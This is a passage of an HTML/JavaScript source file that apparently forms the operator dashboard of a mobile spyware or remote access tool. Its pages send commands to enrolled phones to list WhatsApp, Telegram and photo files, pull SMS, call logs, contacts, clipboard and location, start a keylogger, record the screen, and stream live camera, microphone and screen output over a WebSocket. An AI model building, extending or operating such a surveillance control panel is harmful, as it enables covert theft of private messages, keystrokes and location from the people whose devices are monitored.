     1→  3500→  <div class="cmd-grid" id="cmdGrid"></div>
     2→  3501→</div>
     3→  3502→<div class="card">
     4→  3503→  <h3>&#x1F4CB; Command Log</h3>
     5→  3504→  <div class="filter-bar">
     6→  3505→    <span class="filter-label">Filter:</span>
     7→  3506→    <select id="cmdStatusFilter" onchange="filterCommandLog()">
     8→  3507→      <option value="all">All Status</option>
     9→  3508→      <option value="pending">Pending</option>
    10→  3509→      <option value="completed">Completed</option>
    11→  3510→      <option value="failed">Failed</option>
    12→  3511→    </select>
    13→  3512→    <input type="text" id="cmdSearchInput" placeholder="Search commands..." oninput="filterCommandLog()" style="max-width:200px">
    14→  3513→  </div>
    15→  3514→  <div id="cmdLog" class="command-log"></div>
    16→  3515→</div>
    17→  3516→</div>
    18→  3517→
    19→  3518→<!-- ====== Files Page ====== -->
    20→  3519→<div class="page" id="page-files">
    21→  3520→<div class="topbar"><h1>&#x1F4C2; File Browser</h1></div>
    22→  3521→<div class="card"><h3>Select device to browse files</h3>
    23→  3522→<select id="fileDevice" style="width:100%;padding:10px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text)"></select>
    24→  3523→<div class="cmd-grid" style="margin-top:12px">
    25→  3524→  <button class="cmd-btn" onclick="sendCmd('list_downloads')">&#x1F4E5; Downloads</button>
    26→  3525→  <button class="cmd-btn" onclick="sendCmd('list_dcim')">&#x1F4F8; DCIM</button>
    27→  3526→  <button class="cmd-btn" onclick="sendCmd('list_music')">&#x1F3B5; Music</button>
    28→  3527→  <button class="cmd-btn" onclick="sendCmd('list_videos')">&#x1F3AC; Videos</button>
    29→  3528→  <button class="cmd-btn" onclick="sendCmd('list_documents')">&#x1F4C1; Documents</button>
    30→  3529→  <button class="cmd-btn" onclick="sendCmd('list_whatsapp')">&#x1F4AC; WhatsApp</button>
    31→  3530→  <button class="cmd-btn" onclick="sendCmd('list_telegram_files')">&#x2708;&#xFE0F; Telegram</button>
    32→  3531→  <button class="cmd-btn" onclick="sendCmd('recent_files')">&#x1F550; Recent</button>
    33→  3532→</div></div>
    34→  3533→</div>
    35→  3534→
    36→  3535→<!-- ====== Data Page ====== -->
    37→  3536→<div class="page" id="page-data">
    38→  3537→<div class="topbar"><h1>&#x1F4E6; Data Viewer</h1></div>
    39→  3538→<div class="card"><h3>Quick Data</h3>
    40→  3539→<select id="dataDevice" style="width:100%;padding:10px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-bottom:12px"></select>
    41→  3540→<div class="cmd-grid">
    42→  3541→  <button class="cmd-btn" onclick="sendDataCmd('sms')">&#x1F4F2; SMS</button>
    43→  3542→  <button class="cmd-btn" onclick="sendDataCmd('calls')">&#x1F4DE; Calls</button>
    44→  3543→  <button class="cmd-btn" onclick="sendDataCmd('contacts')">&#x1F4C7; Contacts</button>
    45→  3544→  <button class="cmd-btn" onclick="sendDataCmd('location')">&#x1F4CD; Location</button>
    46→  3545→  <button class="cmd-btn" onclick="sendDataCmd('notifications')">&#x1F514; Notifications</button>
    47→  3546→  <button class="cmd-btn" onclick="sendDataCmd('clipboard')">&#x1F4CB; Clipboard</button>
    48→  3547→  <button class="cmd-btn" onclick="sendDataCmd('battery')">&#x1F50B; Battery</button>
    49→  3548→  <button class="cmd-btn" onclick="sendDataCmd('info')">&#x2139;&#xFE0F; Device Info</button>
    50→  3549→</div></div>
    51→  3550→</div>
    52→  3551→
    53→  3552→<!-- ====== Monitor Page ====== -->
    54→  3553→<div class="page" id="page-monitor">
    55→  3554→<div class="topbar"><h1>&#x1F50D; Monitoring</h1></div>
    56→  3555→<div class="card"><h3>Monitor Controls</h3>
    57→  3556→<select id="monDevice" style="width:100%;padding:10px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-bottom:12px"></select>
    58→  3557→<div class="cmd-grid">
    59→  3558→  <button class="cmd-btn" onclick="sendMonCmd('keylogger_start')">&#x2328;&#xFE0F; Start Keylogger</button>
    60→  3559→  <button class="cmd-btn" onclick="sendMonCmd('keylogger_stop')">&#x23F9; Stop Keylogger</button>
    61→  3560→  <button class="cmd-btn" onclick="sendMonCmd('get_keylogger')">&#x1F4E5; Get Keys</button>
    62→  3561→  <button class="cmd-btn" onclick="sendMonCmd('screen_record_start')">&#x1F534; Start Screen Record</button>
    63→  3562→  <button class="cmd-btn" onclick="sendMonCmd('screen_record_stop')">&#x23F9; Stop Screen Record</button>
    64→  3563→  <button class="cmd-btn" onclick="sendMonCmd('location_live')">&#x1F5FA;&#xFE0F; Live Location</button>
    65→  3564→  <button class="cmd-btn" onclick="sendMonCmd('location_stop')">&#x23F9; Stop Tracking</button>
    66→  3565→  <button class="cmd-btn" onclick="sendMonCmd('location_history')">&#x1F4DC; Location History</button>
    67→  3566→  <button class="cmd-btn" onclick="sendMonCmd('sms_monitor')">&#x1F4F2; SMS Monitor</button>
    68→  3567→  <button class="cmd-btn" onclick="sendMonCmd('call_monitor')">&#x1F4DE; Call Monitor</button>
    69→  3568→</div></div>
    70→  3569→</div>
    71→  3570→
    72→  3571→<!-- ====== Events Page ====== -->
    73→  3572→<div class="page" id="page-events">
    74→  3573→<div class="topbar">
    75→  3574→  <h1>&#x1F4CB; Event Log</h1>
    76→  3575→  <button class="btn btn-secondary btn-sm" onclick="loadEvents()">&#x1F504; Refresh</button>
    77→  3576→</div>
    78→  3577→<div class="filter-bar">
    79→  3578→  <span class="filter-label">Device:</span>
    80→  3579→  <select id="eventDeviceFilter" onchange="filterEventLog()"><option value="all">All Devices</option></select>
    81→  3580→  <span class="filter-label">Type:</span>
    82→  3581→  <select id="eventTypeFilter" onchange="filterEventLog()">
    83→  3582→    <option value="all">All Types</option>
    84→  3583→    <option value="security">Security</option>
    85→  3584→    <option value="info">Info</option>
    86→  3585→    <option value="warning">Warning</option>
    87→  3586→    <option value="success">Success</option>
    88→  3587→  </select>
    89→  3588→  <span class="filter-label">Date:</span>
    90→  3589→  <input type="date" id="eventDateFilter" onchange="filterEventLog()" style="max-width:160px">
    91→  3590→</div>
    92→  3591→<div class="auto-scroll-bar">
    93→  3592→  <label><input type="checkbox" id="eventAutoScroll" checked> Auto-scroll to latest</label>
    94→  3593→</div>
    95→  3594→<div class="table-wrap">
    96→  3595→  <table>
    97→  3596→    <thead><tr>
    98→  3597→      <th>Time</th><th>Device</th><th>Type</th><th>Event</th><th>Details</th>
    99→  3598→    </tr></thead>
   100→  3599→    <tbody id="eventLogBody"></tbody>
   101→  3600→  </table>
   102→  3601→</div>
   103→  3602→<div id="eventLogEmpty" class="empty" style="display:none">
   104→  3603→  <div class="empty-icon">&#x1F4ED;</div>No events found
   105→  3604→</div>
   106→  3605→</div>
   107→  3606→
   108→  3607→<!-- ====== Streaming Page ====== -->
   109→  3608→<div class="page" id="page-streaming">
   110→  3609→<div class="topbar"><h1>&#x1F4E1; Live Stream</h1></div>
   111→  3610→<div class="stream-layout">
   112→  3611→<div class="stream-controls">
   113→  3612→  <div class="card" style="margin-bottom:0">
   114→  3613→    <h3>Device</h3>
   115→  3614→    <select id="streamDevice" style="width:100%;padding:10px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-bottom:0" onchange="onStreamDeviceChange()"></select>
   116→  3615→  </div>
   117→  3616→  <div class="card" style="margin-bottom:0">
   118→  3617→    <h3>Stream Type</h3>
   119→  3618→    <div class="stream-type-grid">
   120→  3619→      <button class="stream-type-btn active" id="stScreen" onclick="selectStreamType('screen')">
   121→  3620→        <span class="st-icon">&#x1F5A5;&#xFE0F;</span>Screen
   122→  3621→      </button>
   123→  3622→      <button class="stream-type-btn" id="stCamera" onclick="selectStreamType('camera')">
   124→  3623→        <span class="st-icon">&#x1F4F7;</span>Camera
   125→  3624→      </button>
   126→  3625→      <button class="stream-type-btn" id="stAudio" onclick="selectStreamType('audio')">
   127→  3626→        <span class="st-icon">&#x1F399;&#xFE0F;</span>Audio
   128→  3627→      </button>
   129→  3628→    </div>
   130→  3629→  </div>
   131→  3630→  <div class="card" style="margin-bottom:0">
   132→  3631→    <h3>Controls</h3>
   133→  3632→    <div class="stream-actions">
   134→  3633→      <button class="btn btn-primary" id="btnStartStream" onclick="startStream()">&#x25B6; Start Stream</button>
   135→  3634→      <button class="btn btn-danger" id="btnStopStream" onclick="stopStream()" style="display:none">&#x23F9; Stop Stream</button>
   136→  3635→      <button class="btn btn-secondary" id="btnSwitchCam" onclick="switchCamera()" style="display:none">&#x1F504; Switch Camera</button>
   137→  3636→    </div>
   138→  3637→  </div>
   139→  3638→  <div class="card" style="margin-bottom:0" id="qualityCard">
   140→  3639→    <h3>Quality</h3>
   141→  3640→    <div class="stream-quality">
   142→  3641→      <button class="active" onclick="setQuality('low',this)">SD</button>
   143→  3642→      <button onclick="setQuality('medium',this)">HD</button>
   144→  3643→      <button onclick="setQuality('high',this)">FHD</button>
   145→  3644→    </div>
   146→  3645→  </div>
   147→  3646→  <div class="card" style="margin-bottom:0">
   148→  3647→    <h3>Stream Info</h3>
   149→  3648→    <div class="stream-info" id="streamInfoPanel">
   150→  3649→      <div><span>Status</span><span id="stStatus">Stopped</span></div>
   151→  3650→      <div><span>Type</span><span id="stType">-</span></div>
   152→  3651→      <div><span>Device</span><span id="stDevice">-</span></div>
   153→  3652→      <div><span>Frames</span><span id="stFrames">0</span></div>
   154→  3653→      <div><span>Last Activity</span><span id="stLastAct">-</span></div>
   155→  3654→    </div>
   156→  3655→  </div>
   157→  3656→</div>
   158→  3657→<div>
   159→  3658→  <div class="stream-viewer" id="streamViewer">
   160→  3659→    <div class="no-stream" id="noStreamMsg">
   161→  3660→      <div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>
   162→  3661→      Select a device and start streaming
   163→  3662→    </div>
   164→  3663→    <img id="streamImg" style="display:none" alt="stream">
   165→  3664→    <div class="stream-badge" id="streamBadge" style="display:none">LIVE</div>
   166→  3665→  </div>
   167→  3666→  <div id="audioPlayerContainer" style="display:none;margin-top:12px;background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:16px">
   168→  3667→    <div style="display:flex;align-items:center;gap:12px;margin-bottom:8px">
   169→  3668→      <span style="font-size:20px">&#x1F399;&#xFE0F;</span>
   170→  3669→      <span style="font-weight:600">Live Audio Stream</span>
   171→  3670→      <span class="badge badge-green" id="audioLiveBadge">LIVE</span>
   172→  3671→    </div>
   173→  3672→    <div class="audio-bars" id="audioBars"></div>
   174→  3673→    <audio id="streamAudio" autoplay style="width:100%;margin-top:8px"></audio>
   175→  3674→  </div>
   176→  3675→</div>
   177→  3676→</div>
   178→  3677→</div>
   179→  3678→
   180→  3679→<!-- ====== Settings Page ====== -->
   181→  3680→<div class="page" id="page-settings">
   182→  3681→<div class="topbar"><h1>&#x2699;&#xFE0F; Settings</h1></div>
   183→  3682→<div class="card"><h3>Server Settings</h3>
   184→  3683→<div id="settingsForm"></div>
   185→  3684→<button class="btn btn-primary" onclick="saveSettings()" style="margin-top:12px">&#x1F4BE; Save</button></div>
   186→  3685→</div>
   187→  3686→
   188→  3687→</div></div>
   189→  3688→
   190→  3689→<div class="notification" id="notif"></div>
   191→  3690→
   192→  3691→<script>
   193→  3692→/* ========== Utilities ========== */
   194→  3693→function esc(s){
   195→  3694→  if(s==null)return '';
   196→  3695→  return String(s).replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/"/g,'&quot;').replace(/'/g,'&#39;');
   197→  3696→}
   198→  3697→function relativeTime(dateStr){
   199→  3698→  if(!dateStr)return '';
   200→  3699→  try{
   201→  3700→    var d=new Date(dateStr);
   202→  3701→    if(isNaN(d.getTime()))return dateStr;
   203→  3702→    var now=Date.now();
   204→  3703→    var diff=Math.floor((now-d.getTime())/1000);
   205→  3704→    if(diff<0)diff=0;
   206→  3705→    if(diff<10)return 'just now';
   207→  3706→    if(diff<60)return diff+'s ago';
   208→  3707→    if(diff<3600)return Math.floor(diff/60)+'m ago';
   209→  3708→    if(diff<86400)return Math.floor(diff/3600)+'h ago';
   210→  3709→    if(diff<604800)return Math.floor(diff/86400)+'d ago';
   211→  3710→    return d.toLocaleDateString();
   212→  3711→  }catch(e){return dateStr;}
   213→  3712→}
   214→  3713→
   215→  3714→/* ========== State ========== */
   216→  3715→var TOKEN=localStorage.getItem('az_token')||'';
   217→  3716→var POLL_INTERVAL=null;
   218→  3717→var DEVICES=[];
   219→  3718→var ALL_COMMANDS=[];
   220→  3719→var ALL_EVENTS=[];
   221→  3720→var PENDING_REFRESH=null;
   222→  3721→
   223→  3722→/* ========== Notification ========== */
   224→  3723→function notify(msg,color){
   225→  3724→  color=color||'var(--green)';
   226→  3725→  var n=document.getElementById('notif');
   227→  3726→  n.innerHTML='<span style="color:'+color+';font-size:16px">&#x2713;</span> '+esc(msg);
   228→  3727→  n.style.borderColor=color;
   229→  3728→  n.classList.add('show');
   230→  3729→  clearTimeout(n._t);
   231→  3730→  n._t=setTimeout(function(){n.classList.remove('show');},3000);
   232→  3731→}
   233→  3732→
   234→  3733→/* ========== API ========== */
   235→  3734→function api(path,opts){
   236→  3735→  opts=opts||{};
   237→  3736→  return fetch('/api/'+path,{
   238→  3737→    headers:{'Content-Type':'application/json',...(TOKEN?{'Authorization':'Bearer '+TOKEN}:{})},
   239→  3738→    ...opts
   240→  3739→  }).then(function(r){return r.json();});
   241→  3740→}
   242→  3741→
   243→  3742→/* ========== Auth ========== */
   244→  3743→async function doLogin(){
   245→  3744→  var u=document.getElementById('loginUser').value;
   246→  3745→  var p=document.getElementById('loginPass').value;
   247→  3746→  var r=await api('login',{method:'POST',body:JSON.stringify({username:u,password:p})});
   248→  3747→  if(r.ok){TOKEN=r.token;localStorage.setItem('az_token',TOKEN);showApp();}
   249→  3748→  else{document.getElementById('loginError').style.display='block';}
   250→  3749→}
   251→  3750→function doLogout(){
   252→  3751→  try{api('web/logout',{method:'POST'});}catch(e){}
   253→  3752→  TOKEN='';localStorage.removeItem('az_token');
   254→  3753→  document.getElementById('app').style.display='none';
   255→  3754→  document.getElementById('loginPage').style.display='flex';
   256→  3755→  if(POLL_INTERVAL)clearInterval(POLL_INTERVAL);
   257→  3756→  if(ws&&ws.readyState<2)ws.close();
   258→  3757→}
   259→  3758→function showApp(){
   260→  3759→  document.getElementById('loginPage').style.display='none';
   261→  3760→  document.getElementById('app').style.display='block';
   262→  3761→  loadAll();
   263→  3762→  connectWS();
   264→  3763→  POLL_INTERVAL=setInterval(loadAll,8000);
   265→  3764→}
   266→  3765→
   267→  3766→/* ========== Sidebar ========== */
   268→  3767→function toggleSidebar(){
   269→  3768→  document.getElementById('sidebar').classList.toggle('open');
   270→  3769→  document.getElementById('sidebarOverlay').classList.toggle('open');
   271→  3770→}
   272→  3771→function showPage(name,el){
   273→  3772→  document.querySelectorAll('.page').forEach(function(p){p.classList.remove('active');});
   274→  3773→  document.getElementById('page-'+name).classList.add('active');
   275→  3774→  document.querySelectorAll('.sidebar a[data-page]').forEach(function(a){a.classList.remove('active');});
   276→  3775→  if(el)el.classList.add('active');
   277→  3776→  else{
   278→  3777→    var link=document.querySelector('.sidebar a[data-page="'+name+'"]');
   279→  3778→    if(link)link.classList.add('active');
   280→  3779→  }
   281→  3780→  document.getElementById('sidebar').classList.remove('open');
   282→  3781→  document.getElementById('sidebarOverlay').classList.remove('open');
   283→  3782→}
   284→  3783→
   285→  3784→/* ========== Clock ========== */
   286→  3785→function updateClock(){
   287→  3786→  var now=new Date();
   288→  3787→  document.getElementById('clock').textContent=now.toLocaleString('ar-SA');
   289→  3788→}
   290→  3789→setInterval(updateClock,1000);updateClock();
   291→  3790→
   292→  3791→/* ========== WebSocket ========== */
   293→  3792→var ws=null;
   294→  3793→var wsReconnectDelay=1000;
   295→  3794→var wsMaxDelay=30000;
   296→  3795→function connectWS(){
   297→  3796→  if(!TOKEN)return;
   298→  3797→  try{
   299→  3798→    var proto=location.protocol==='https:'?'wss:':'ws:';
   300→  3799→    ws=new WebSocket(proto+'//'+location.host+'/ws/dashboard?token='+encodeURIComponent(TOKEN));
   301→  3800→    ws.onopen=function(){
   302→  3801→      wsReconnectDelay=1000;
   303→  3802→      setWSStatus('connected');
   304→  3803→    };
   305→  3804→    ws.onmessage=function(ev){
   306→  3805→      try{
   307→  3806→        var msg=JSON.parse(ev.data);
   308→  3807→        handleWSMessage(msg);
   309→  3808→      }catch(e){}
   310→  3809→    };
   311→  3810→    ws.onclose=function(){
   312→  3811→      setWSStatus('disconnected');
   313→  3812→      wsReconnectDelay=Math.min(wsReconnectDelay*1.5,wsMaxDelay);
   314→  3813→      setTimeout(connectWS,wsReconnectDelay);
   315→  3814→    };
   316→  3815→    ws.onerror=function(){
   317→  3816→      ws.close();
   318→  3817→    };
   319→  3818→  }catch(e){
   320→  3819→    setTimeout(connectWS,wsReconnectDelay);
   321→  3820→  }
   322→  3821→}
   323→  3822→function setWSStatus(status){
   324→  3823→  var ind=document.getElementById('wsIndicator');
   325→  3824→  var txt=document.getElementById('wsStatusText');
   326→  3825→  ind.className='live-indicator';
   327→  3826→  if(status==='connected'){ind.classList.remove('offline','connecting');txt.textContent='Live';}
   328→  3827→  else if(status==='disconnected'){ind.classList.add('offline');txt.textContent='Offline';}
   329→  3828→  else{ind.classList.add('connecting');txt.textContent='Connecting';}
   330→  3829→}
   331→  3830→function handleWSMessage(msg){
   332→  3831→  if(msg.type==='device_update'){
   333→  3832→    var dev=msg.device;
   334→  3833→    var idx=DEVICES.findIndex(function(d){return d.id===dev.id;});
   335→  3834→    if(idx>=0){DEVICES[idx]=dev;}
   336→  3835→    else{DEVICES.push(dev);}
   337→  3836→    populateDeviceSelects();
   338→  3837→    renderDevices();
   339→  3838→    updateDashDevices();
   340→  3839→  }
   341→  3840→  else if(msg.type==='device_online'){notify(msg.device_name+' came online','var(--green)');loadAll();}
   342→  3841→  else if(msg.type==='device_offline'){notify(msg.device_name+' went offline','var(--red)');loadAll();}
   343→  3842→  else if(msg.type==='command_update'){
   344→  3843→    var ci=ALL_COMMANDS.findIndex(function(c){return c.id===msg.command.id;});
   345→  3844→    if(ci>=0)ALL_COMMANDS[ci]=msg.command;
   346→  3845→    else ALL_COMMANDS.push(msg.command);
   347→  3846→    renderCommandLog(ALL_COMMANDS);
   348→  3847→    checkPendingRefresh();
   349→  3848→  }
   350→  3849→  else if(msg.type==='new_event'){
   351→  3850→    ALL_EVENTS.push(msg.event);
   352→  3851→    if(ALL_EVENTS.length>500)ALL_EVENTS=ALL_EVENTS.slice(-500);
   353→  3852→    renderEventLog(ALL_EVENTS);
   354→  3853→    populateEventDeviceFilter();
   355→  3854→  }
   356→  3855→  else if(msg.type==='stats_update'){
   357→  3856→    renderStats(msg.stats);
   358→  3857→  }
   359→  3858→}
   360→  3859→
   361→  3860→/* ========== Populate Selects ========== */
   362→  3861→function populateDeviceSelects(){
   363→  3862→  var html=DEVICES.map(function(d){return '<option value="'+esc(d.id)+'">'+esc(d.name||d.id)+' ('+(d.active?'Online':'Offline')+')</option>';}).join('');
   364→  3863→  ['cmdDevice','fileDevice','dataDevice','monDevice','streamDevice'].forEach(function(id){
   365→  3864→    var el=document.getElementById(id);if(el)el.innerHTML=html;
   366→  3865→  });
   367→  3866→  populateEventDeviceFilter();
   368→  3867→}
   369→  3868→function populateEventDeviceFilter(){
   370→  3869→  var sel=document.getElementById('eventDeviceFilter');
   371→  3870→  if(!sel)return;
   372→  3871→  var cur=sel.value;
   373→  3872→  var html='<option value="all">All Devices</option>';
   374→  3873→  DEVICES.forEach(function(d){html+='<option value="'+esc(d.id)+'">'+esc(d.name||d.id)+'</option>';});
   375→  3874→  sel.innerHTML=html;
   376→  3875→  sel.value=cur;
   377→  3876→}
   378→  3877→
   379→  3878→/* ========== Load All ========== */
   380→  3879→async function loadAll(){
   381→  3880→  try{var r=await api('web/stats');if(r.ok)renderStats(r.stats);}catch(e){}
   382→  3881→  try{var r=await api('web/devices');if(r.ok){DEVICES=r.devices||[];populateDeviceSelects();renderDevices();updateDashDevices();}}catch(e){}
   383→  3882→  try{var r=await api('web/commands');if(r.ok){ALL_COMMANDS=r.commands||[];renderCommandLog(ALL_COMMANDS);checkPendingRefresh();}}catch(e){}
   384→  3883→  loadEvents();
   385→  3884→  loadSettings();
   386→  3885→}
   387→  3886→
   388→  3887→/* ========== Stats Cards ========== */
   389→  3888→function renderStats(s){
   390→  3889→  var eventsToday=0;
   391→  3890→  var now=new Date();var todayStr=now.toISOString().slice(0,10);
   392→  3891→  ALL_EVENTS.forEach(function(ev){if((ev.time||'').slice(0,10)===todayStr)eventsToday++;});
   393→  3892→  var grid=document.getElementById('statsGrid');
   394→  3893→  grid.innerHTML=
   395→  3894→  '<div class="stat-card"><div class="stat-icon blue">&#x1F4F1;</div><div class="label">Total Devices</div><div class="value" style="color:var(--blue)">'+esc(s.devices_total)+'</div><div class="sub">&#x1F7E2; '+esc(s.devices_online)+' online</div></div>'+
   396→  3895→  '<div class="stat-card"><div class="stat-icon green">&#x26A1;</div><div class="label">Online Devices</div><div class="value" style="color:var(--green)">'+esc(s.devices_online)+'</div><div class="sub">of '+esc(s.devices_total)+' total</div></div>'+
   397→  3896→  '<div class="stat-card"><div class="stat-icon yellow">&#x23F3;</div><div class="label">Pending Commands</div><div class="value" style="color:var(--yellow)">'+esc(s.commands_pending)+'</div><div class="sub">'+esc(s.total_registered_commands)+' registered</div></div>'+
   398→  3897→  '<div class="stat-card"><div class="stat-icon purple">&#x1F4CB;</div><div class="label">Events Today</div><div class="value" style="color:var(--purple)">'+eventsToday+'</div><div class="sub">'+esc(s.events_total)+' total events</div></div>'+
   399→  3898→  '<div class="stat-card"><div class="stat-icon orange">&#x2709;&#xFE0F;</div><div class="label">Messages Sent</div><div class="value" style="color:var(--orange)">'+esc(s.messages_sent)+'</div></div>'+
   400→  3899→  '<div class="stat-card"><div class="stat-icon green">&#x2705;</div><div class="label">Commands Done</div><div class="value" style="color:var(--green)">'+esc(s.commands_completed)+'</div><div class="sub">&#x1F4E1; '+esc(s.api_hits)+' API hits</div></div>'+
   401→  3900→  '<div class="stat-card"><div class="stat-icon blue">&#x23F1;</div><div class="label">Uptime</div><div class="value" style="font-size:18px;color:var(--blue)">'+esc(s.uptime_formatted||'-')+'</div></div>';
   402→  3901→}
   403→  3902→
   404→  3903→/* ========== Device Cards ========== */
   405→  3904→function batteryClass(pct){
   406→  3905→  pct=parseInt(pct)||0;
   407→  3906→  if(pct>50)return 'high';
   408→  3907→  if(pct>20)return 'mid';
   409→  3908→  return 'low';
   410→  3909→}
   411→  3910→function batteryColor(pct){
   412→  3911→  pct=parseInt(pct)||0;
   413→  3912→  if(pct>50)return 'var(--green)';
   414→  3913→  if(pct>20)return 'var(--yellow)';
   415→  3914→  return 'var(--red)';
   416→  3915→}
   417→  3916→function signalBarsHtml(strength){
   418→  3917→  var s=parseInt(strength)||0;
   419→  3918→  var bars=4;
   420→  3919→  if(s<25)bars=1;else if(s<50)bars=2;else if(s<75)bars=3;
   421→  3920→  var html='<div class="signal-bars">';
   422→  3921→  for(var i=1;i<=4;i++)html+='<div class="bar'+(i<=bars?' active':'')+'"></div>';
   423→  3922→  html+='</div>';
   424→  3923→  return html;
   425→  3924→}
   426→  3925→function deviceCardHtml(d){
   427→  3926→  var isOn=!!d.active;
   428→  3927→  var batt=parseInt(d.battery)||null;
   429→  3928→  var battHtml=batt!==null?'<div class="battery-bar"><div class="battery-shell"><div class="battery-fill '+batteryClass(batt)+'" style="width:'+Math.max(0,Math.min(100,batt))+'%"></div></div><span class="battery-text" style="color:'+batteryColor(batt)+'">'+batt+'%</span></div>':'';
   430→  3929→  var sigHtml=d.signal?signalBarsHtml(d.signal):'';
   431→  3930→  return '<div class="device-card" onclick="showDeviceDetail(\''+esc(d.id)+'\')">'+
   432→  3931→    '<div class="dc-header">'+
   433→  3932→      '<div class="dc-status '+(isOn?'online':'offline')+'"></div>'+
   434→  3933→      '<div class="dc-name">'+esc(d.name||d.id)+'</div>'+
   435→  3934→    '</div>'+
   436→  3935→    '<div class="dc-model">'+esc(d.model||'Unknown Model')+(d.os?' | '+esc(d.os):'')+'</div>'+
   437→  3936→    '<div class="dc-meta">'+
   438→  3937→      (battHtml?'<div class="meta-item"><span class="meta-icon">&#x1F50B;</span>'+battHtml+'</div>':'')+
   439→  3938→      (sigHtml?'<div class="meta-item"><span class="meta-icon">&#x1F4F6;</span>'+sigHtml+'</div>':'')+
   440→  3939→      '<div class="meta-item"><span class="meta-icon">&#x1F552;</span><span class="relative-time">'+relativeTime(d.last_seen)+'</span></div>'+
   441→  3940→      (d.network?'<div class="meta-item"><span class="meta-icon">&#x1F310;</span>'+esc(d.network)+'</div>':'')+
   442→  3941→    '</div>'+
   443→  3942→  '</div>';
   444→  3943→}
   445→  3944→function renderDevices(){
   446→  3945→  var filtered=filterDevicesList(DEVICES);
   447→  3946→  var el=document.getElementById('deviceList');
   448→  3947→  if(!filtered.length){el.innerHTML='<div class="empty"><div class="empty-icon">&#x1F4F1;</div>No devices found</div>';return;}
   449→  3948→  el.innerHTML=filtered.map(deviceCardHtml).join('');
   450→  3949→}
   451→  3950→function updateDashDevices(){
   452→  3951→  var dash=document.getElementById('dashDevices');
   453→  3952→  if(!DEVICES.length){dash.innerHTML='<div class="empty">No devices</div>';return;}
   454→  3953→  dash.innerHTML=DEVICES.filter(function(d){return d.active;}).slice(0,6).map(deviceCardHtml).join('');
   455→  3954→}
   456→  3955→function filterDevices(){
   457→  3956→  renderDevices();
   458→  3957→}
   459→  3958→function filterDevicesList(devices){
   460→  3959→  var q=(document.getElementById('deviceSearch').value||'').toLowerCase();
   461→  3960→  var statusF=document.getElementById('deviceStatusFilter').value;
   462→  3961→  return devices.filter(function(d){
   463→  3962→    if(statusF==='online'&&!d.active)return false;
   464→  3963→    if(statusF==='offline'&&d.active)return false;
   465→  3964→    if(q){
   466→  3965→      var text=(d.name||' '+d.id+' '+d.model+' '+d.os).toLowerCase();
   467→  3966→      if(text.indexOf(q)<0)return false;
   468→  3967→    }
   469→  3968→    return true;
   470→  3969→  });
   471→  3970→}
   472→  3971→
   473→  3972→/* ========== Device Detail ========== */
   474→  3973→async function showDeviceDetail(id){
   475→  3974→  try{
   476→  3975→    var r=await api('web/device/'+id);
   477→  3976→    if(!r.ok)return;
   478→  3977→    var d=r.device;var cmds=r.commands||[];
   479→  3978→    var detail=document.getElementById('deviceDetail');
   480→  3979→    detail.style.display='block';
   481→  3980→    var batt=parseInt(d.battery)||null;
   482→  3981→    var battHtml=batt!==null?'<span style="color:'+batteryColor(batt)+';font-weight:600">'+batt+'%</span> '+
   483→  3982→      '<div class="battery-bar" style="display:inline-flex;vertical-align:middle;margin-right:8px"><div class="battery-shell"><div class="battery-fill '+batteryClass(batt)+'" style="width:'+Math.max(0,Math.min(100,batt))+'%"></div></div></div>':'-';
   484→  3983→    detail.innerHTML=
   485→  3984→      '<div style="display:flex;align-items:center;gap:12px;margin-bottom:16px">'+
   486→  3985→        '<div class="dc-status '+(d.active?'online':'offline')+'" style="width:14px;height:14px"></div>'+
   487→  3986→        '<h2 style="font-size:20px">'+esc(d.name||d.id)+'</h2>'+
   488→  3987→        (d.active?'<span class="badge badge-green">Online</span>':'<span class="badge badge-red">Offline</span>')+
   489→  3988→      '</div>'+
   490→  3989→      '<div style="display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:12px;margin-bottom:20px">'+
   491→  3990→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">DEVICE ID</div><code style="font-size:12px">'+esc(d.id)+'</code></div>'+
   492→  3991→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">MODEL</div><div>'+esc(d.model||'-')+'</div></div>'+
   493→  3992→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">OS</div><div>'+esc(d.os||'-')+'</div></div>'+
   494→  3993→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">BATTERY</div><div>'+battHtml+'</div></div>'+
   495→  3994→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">NETWORK</div><div>'+esc(d.network||'-')+'</div></div>'+
   496→  3995→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">LOCATION</div><div>'+esc(d.location||'-')+'</div></div>'+
   497→  3996→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">LAST SEEN</div><div>'+esc(d.last_seen||'-')+' <span class="relative-time">('+relativeTime(d.last_seen)+')</span></div></div>'+
   498→  3997→        '<div class="card" style="margin:0;padding:14px"><div style="color:var(--text-muted);font-size:11px;margin-bottom:2px">CREATED</div><div>'+esc(d.created_at||'-')+'</div></div>'+
   499→  3998→      '</div>'+
   500→  3999→      '<h3 style="margin-bottom:12px">&#x1F4CB; Recent Commands</h3>'+
   501→  4000→      (cmds.length?cmds.map(function(c){return cmdItemHtml(c);}).join(''):'<div class="empty">No commands</div>')+
   502→  4001→      '<button class="btn btn-danger btn-sm" onclick="unlinkDevice(\''+esc(d.id)+'\')" style="margin-top:16px">&#x1F5D1;&#xFE0F; Unlink Device</button>';
   503→  4002→    detail.scrollIntoView({behavior:'smooth'});
   504→  4003→  }catch(e){}
   505→  4004→}
   506→  4005→
   507→  4006→/* ========== Unlink / Link ========== */
   508→  4007→async function unlinkDevice(id){
   509→  4008→  if(!confirm('Unlink this device?'))return;
   510→  4009→  var r=await api('web/unlink/'+id,{method:'DELETE'});
